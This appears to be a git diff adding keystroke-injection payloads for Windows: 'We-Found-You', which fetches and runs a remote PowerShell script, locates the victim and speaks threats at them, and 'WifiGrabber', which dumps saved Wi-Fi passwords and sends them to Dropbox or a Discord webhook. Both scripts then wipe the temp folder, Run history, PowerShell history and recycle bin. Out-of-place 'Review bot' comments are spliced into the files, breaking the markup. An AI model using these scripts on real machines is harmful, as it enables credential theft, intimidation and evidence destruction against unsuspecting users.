diff --git a/Payloads/We-Found-You/We-Found-You.txt b/Payloads/We-Found-You/We-Found-You.txt
new file mode 100644
index 0000000..4718610
--- /dev/null
+++ b/Payloads/We-Found-You/We-Found-You.txt
@@ -0,0 +1,16 @@
+REM Title: We-Found-You
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to open a map in your target's web browser with their current location.
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex
+ENTER
diff --git a/Payloads/We-Found-You/found-you.ps1 b/Payloads/We-Found-You/found-you.ps1
new file mode 100644
index 0000000..c4be40e
--- /dev/null
+++ b/Payloads/We-Found-You/found-you.ps1
@@ -0,0 +1,177 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ The target's Location Services must be turned on or this payload will not work.
+
+.SYNOPSIS
+ This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
+
+.DESCRIPTION
+ This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
+ The SSID and WiFi password of any current or previously connected to networks.
+ It determines the last day they changed their password and how many days ago.
+ Once the information is gathered, the script will pause until a mouse movement is detected.
+ Then the script uses Sapi speak to roast their set up and lack of security.
+#>
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
+#>
+
+function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the current Latitude and Longitude of your target
+#>
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
+
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+$GL = Get-GeoLocation
+
+$GL = $GL -split " "
+
+$Lat = $GL[0].Substring(11) -replace ".$"
+
+$Lon = $GL[1].Substring(10) -replace ".$"
+
+Pause-Script
+
+# Opens their browser with a map of their current location
+
+Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
+
+Start-Sleep -s 3
+
+# Sets Volume to max level
+
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# Sets up speech module
+
+$s=New-Object -ComObject SAPI.SpVoice
+$s.Rate = -2
+$s.Speak("We found you $FN")
+$s.Speak("We know where you are")
+$s.Speak("We are everywhere")
+$s.Speak("We do not forgive, we do not forget")
+$s.Speak("Expect us")
+
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/We-Found-You/location.jpg b/Payloads/We-Found-You/location.jpg
new file mode 100644
index 0000000..7b6e943
Binary files /dev/null and b/Payloads/We-Found-You/location.jpg differ
diff --git a/Payloads/WifiGrabber/README.md b/Payloads/WifiGrabber/README.md
new file mode 100644
index 0000000..0394189
--- /dev/null
+++ b/Payloads/WifiGrabber/README.md
@@ -0,0 +1,111 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
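Review bot: The `.DESCRIPTION` block describes a different payload — operating system, RAM, public IP, the Microsoft-account e-mail, Wi-Fi passwords and a password-age check — none of which this file collects; the code below only resolves coordinates through `GeoCoordinateWatcher`, opens latlong.net, raises the volume and speaks. Replace it with a description of what the script actually does (the `.SYNOPSIS` line directly above it is accurate and can be reused). The `.NOTES` entry about Location Services should also state that the coordinates are sent to latlong.net as query parameters in `Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"`, so the target's location ends up with a third party and in the browser history. The cleanup section at the end carries the same `.NOTES` wording as the other payloads but no statement that `rm $env:TEMP\*` removes everything in the temp folder, not only this script's files.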
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Wifi-Grabber + +## Description + +This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both. + +## Getting Started + +### Dependencies + +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory + +`$dc` is the variable that stores your Discord webhook + +`$db` is the variable that stores your Dropbox token + +Fill in either or both of these to methods to exfil your collected data + +``` +powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/WifiGrabber/WifiGrabber.ps1 b/Payloads/WifiGrabber/WifiGrabber.ps1
new file mode 100644
index 0000000..3dfec32
--- /dev/null
+++ b/Payloads/WifiGrabber/WifiGrabber.ps1
@@ -0,0 +1,86 @@ +############################################################################################################################################################ + +$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String + + +$wifiProfiles > $env:TEMP/--wifi-pass.txt + +############################################################################################################################################################ + +# Upload output file to Dropbox + +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt} + +############################################################################################################################################################ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = 
$env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}
+
+
+
+############################################################################################################################################################
+
+function Clean-Exfil {
+
+# empty temp folder
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# delete run box history
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
+
+# Empty recycle bin
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+############################################################################################################################################################
+
+if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}
+
+
+RI $env:TEMP/--wifi-pass.txt
diff --git a/Payloads/WifiGrabber/WifiGrabber.txt b/Payloads/WifiGrabber/WifiGrabber.txt
new file mode 100644
index 0000000..77388c8
--- /dev/null
+++ b/Payloads/WifiGrabber/WifiGrabber.txt
@@ -0,0 +1,12 @@
+REM Title: Wifi Grabber
+
+REM Author: I am Jakoby
+
+REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
+ENTER
diff --git a/Payloads/YT-Tripwire/ReadMe.md b/Payloads/YT-Tripwire/ReadMe.md
new file mode 100644
index 0000000..8d37495
--- /dev/null
+++ b/Payloads/YT-Tripwire/ReadMe.md
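Review bot: `$db` (a Dropbox token sent as `Authorization: Bearer`) and `$dc` (a Discord webhook URL, which is itself a bearer credential) are picked up from the caller's scope by `DropBox-Upload` and `Upload-Discord` with no parameter, comment or file header marking them as secrets, and the companion launcher places both on the `powershell` command line (`$dc='';$db=''`), so anyone who can read that line, or the Run-box entry it leaves, holds write access to the operator's Dropbox and Discord channel. A header comment should say so, e.g. `# $db and $dc are credentials: never commit real values, and treat the launcher line as a secret`. The collected keys are also posted in cleartext (`curl.exe -F "file1=@$file" $hookurl`), so whoever holds the webhook URL reads every Wi-Fi password gathered; that belongs in the same header. `Clean-Exfil` is gated on `$ce`, a variable neither this file nor the launcher documents, and its `rm $env:TEMP\*` removes the whole temp folder rather than only `--wifi-pass.txt`, which the `# empty temp folder` comment understates.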
@@ -0,0 +1,123 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# YouTube Tripwire + +Plays any YouTube video after a mouse movement is detected. + +## Description + +This script is a one liner that can fit in the runbox by itself. +Just replace the URL for the YouTube video and run it. +You can now unplug your device and walk away. +When your target returns and moves their mouse, the video will start playing full screen. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Walk away +* You can run the example snippet below and it will open up a video covering one of my other payloads +* You can of course replace the URL with your own video +``` +powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f') +``` +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/Payloads/YT-Tripwire/YouTube-TripWire.txt b/Payloads/YT-Tripwire/YouTube-TripWire.txt
new file mode 100644
index 0000000..f7d6fd1
--- /dev/null
+++ b/Payloads/YT-Tripwire/YouTube-TripWire.txt
@@ -0,0 +1,10 @@
+REM Title: YouTube-TripWire
+REM Author: I am Jakoby
+REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)
+REM Target: Windows 10, 11
+GUI r
+DELAY 500
+STRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
+ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly